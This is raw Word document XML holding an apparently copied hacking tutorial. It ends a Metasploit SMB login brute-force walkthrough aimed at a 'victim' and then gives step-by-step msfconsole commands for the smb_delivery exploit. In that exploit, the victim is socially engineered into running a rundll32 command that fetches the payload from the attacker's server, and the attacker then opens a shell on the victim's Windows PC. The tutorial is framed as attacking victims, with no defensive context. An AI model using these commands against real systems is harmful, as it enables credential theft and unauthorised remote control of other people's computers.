          <w:p w14:paraId="365E78CF"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614D7936"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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742FE88D" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D4D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF9648D"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use auxiliary/scanner/smb/smb_login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369374D4"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 (smb_login)&gt;set rhosts 192.168.1.118</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F5A961"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 (smb_login)&gt;set user_file /root/Desktop/user.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586FC933"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 (smb_login)&gt;set pass_file /root/Desktop/pass.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538696FF"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 (smb_login)&gt;set stop_on_success true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5B9CEF" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D4D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>msf exploit (smb_login)&gt;exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D0351A3"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Here,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FAB11"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auxiliary/scanner/smb/smb_login—</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>&gt; is a module we will use to attempt to login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28325E47"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/root/Desktop/user.txt –&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> is the path of a text file which is the resident of all the possible usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F579EFD"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/root/Desktop/pass.txt –&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> is the path of a text file in which all the possible passwords resides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B178A" w14:textId="77777777"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the process of dictionary attack will start. Thus, you will attain the username and password of your victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042FBD9" w14:textId="37C6C9C5" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7EF4BD" wp14:editId="298A4005">
            <wp:extent cx="5731510" cy="383159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1D2F410" w14:textId="4421D679" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612DAC15" w14:textId="302F9073" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC5580E" w14:textId="4CCFE77A" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF01DB8" w14:textId="3CB0F2FC" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6690E6" w14:textId="58D1C236" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021478CC" w14:textId="666AE227" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D72ED47" w14:textId="2D0597FB" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA45432" w14:textId="1D3EDE1B" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDB606B" w14:textId="6E0E9B98" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4174154C" w14:textId="1D61E0D9" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFBAF4F" w14:textId="288158AB" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA6CA1E" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="96"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hack Remote Windows PC using DLL Files (SMB Delivery Exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10177551"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This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC4DA2"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Exploit Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B3C4E"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Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85714C"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Requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29585F35"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Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>: kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E492BA0"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Victim PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>: Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B7BE2"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Open Kali terminal type </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716C5003" w14:textId="4BF8AF7C"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noProof/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BAEAC83" wp14:editId="78A423A7">
            <wp:extent cx="5731510" cy="187007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634664CB"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type </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/smb_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95BA8E"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msf exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>smb_delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>set srvhost 192.168.1.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> (IP of Local Host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122A842"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msf exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>smb_delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>set srvport 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DE18A"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>smb_delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E244D3"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we have to copy the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> code generated in victim’s run bar on PC using social engineering method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B771663"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As soon as we do that, we will get access of victim’s PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2B598" w14:textId="2604BC49"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noProof/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771D1E50" wp14:editId="06A93FE4">
            <wp:extent cx="5133975" cy="2047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33975" cy="2047875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D7C10"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t>Now type </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sessions –i</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> to display sessions opened when the victim opens the link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1E3E" w14:textId="77777777"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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now the session has opened type </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> to get system information, then type </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> to enter into Victims command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE25B7" w14:textId="7D5E1DE5" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3320E5AA" wp14:editId="08494163">
            <wp:extent cx="5731510" cy="2167255"/>
            <wp:effectExtent l="0" t="0" r="254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p>
    <w:p w14:paraId="05337257" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00873D4D" w:rsidRPr="00873D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0B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAC27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E6387"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ADA8E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906AA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="371A43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F24392"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E780BC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D30E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68785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5239A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E5A50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903219"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="412A7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F536B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12489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0C1B63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6925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3"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>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DE4"/>
    <w:rsid w:val="000C6DE4"/>
    <w:rsid w:val="006730DC"/>
    <w:rsid w:val="00873D4D"/>
    <w:rsid w:val="008E59EE"/>
    <w:rsid w:val="00921DBA"/>
    <w:rsid w:val="00967159"/>
    <w:rsid w:val="00CB454B"/>
    <w:rsid w:val="00FD1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0F88F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C892E1F0-FB33-44E2-885D-7F17F6281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D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B454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454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B45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v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB454B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB454B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB454B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB454B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-cn">
    <w:name w:val="crayon-cn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB454B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00CB454B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB454B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
